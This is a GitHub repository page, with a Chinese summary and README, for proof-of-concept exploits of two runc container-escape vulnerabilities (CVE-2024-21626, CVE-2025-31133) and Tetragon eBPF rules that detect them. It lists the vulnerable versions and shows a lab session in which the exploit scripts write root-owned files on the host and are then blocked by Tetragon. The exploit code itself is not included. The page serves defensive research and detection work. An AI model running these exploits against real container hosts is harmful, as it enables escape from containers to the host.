scherepiuk/container-escape-ebpf

GitHub: scherepiuk/container-escape-ebpf

提供CVE-2024-21626和CVE-2025-31133两个runc容器逃逸漏洞的利用代码及Tetragon检测规则。

Stars: 1 | Forks: 0

# 前提条件 - 主机运行存在漏洞的 runc 版本: - 对于 [CVE-2025-31133](https://www.cve.org/CVERecord?id=CVE-2025-31133):`1.2.7` 及以下版本,`1.3.0-rc.1` 到 `1.3.2`、`1.4.0-rc.1` 和 `1.4.0-rc.2`。 - 对于 [CVE-2024-21626](https://www.cve.org/CVERecord?id=CVE-2024-21626):`1.0.0-rc93` 到 `1.1.11`。 - 非特权用户能够使用 `runc`(或 containerd 的 `ctr`)通过 OCI 配置文件和普通 rootfs 创建容器。 # 使用方法 ``` you@local:container-escape-ebpf$ make deploy # Setup `aws` CLI with `aws configure` and `terraform/terraform.tfvars` prior to deploying. you@local:container-escape-ebpf$ make ssh # Wait around a minute for the virtual machine to intialize before SSHing. ubuntu@vm:~$ python3 /pocs/cve-2024-21626.py Launched container: 4bvviH3spAXYLNJpoQ7YHlg366eG1mhB ubuntu@vm:~$ ls -la /pwned_by_cve_2024_21626 -rw-r--r-- 1 root root 0 Jan 13 13:49 /pwned_by_cve_2024_21626 ubuntu@vm:~$ python3 /pocs/cve-2025-31133.py Launched container: aeE5aI7Q7aYasXTAy64QKdAIlKMSe19p sh: 1: cannot create /proc/sys/kernel/core_pattern: Read-only file system Exploit did not succeed. Retrying... Launched container: vg4fRLcB87DWxGRGb1lb8mXaIum7mEfQ sh: 1: cannot create /proc/sys/kernel/core_pattern: Read-only file system Exploit did not succeed. Retrying... Launched container: NsaQgj5PYt1qlBmkWtvWJ6R5ZondCjHH Exploit succeeded! ubuntu@vm:~$ ls -la /pwned_by_cve_2025_31133 -rw-r--r-- 1 root root 0 Jan 13 13:52 /pwned_by_cve_2025_31133 ubuntu@vm:~$ /utils/reset.sh ubuntu@vm:~$ sudo systemctl start tetragon ubuntu@vm:~$ python3 /pocs/cve-2024-21626.py runc run failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: permission denied Launched container: Y7VcaVHuPbYoeqERcfFjjQLJxMEo1VPV ubuntu@vm:~$ python3 /pocs/cve-2025-31133.py Launched container: uJdkfzL0feIm6ipPv0PazSUPW6VJ765h sh: 1: cannot create /proc/sys/kernel/core_pattern: Permission denied Exploit did not succeed. Retrying... Launched container: qGKTlsyZ0Hh47DxF1rUIjkBxffLfYUxx sh: 1: cannot create /proc/sys/kernel/core_pattern: Permission denied Exploit did not succeed. Retrying... Launched container: jMrn2W3NLAap6UPA2UB6LQHLLu9yevcO sh: 1: cannot create /proc/sys/kernel/core_pattern: Permission denied bash-5.1# exit exit ubuntu@vm:~$ exit exit you@local:container-escape-ebpf$ make teardown # Don't forget to teardown resources! ```
标签:AWS, CVE-2024-21626, CVE-2025-31133, Docker镜像, DPI, ECS, POC, Python, runc, Terraform, TGT, Web截图, Web报告查看器, 主机逃逸, 子域名枚举, 容器安全, 容器逃逸, 攻防演练, 无后门, 特权容器, 系统安全, 网络安全, 逆向工具, 隐私保护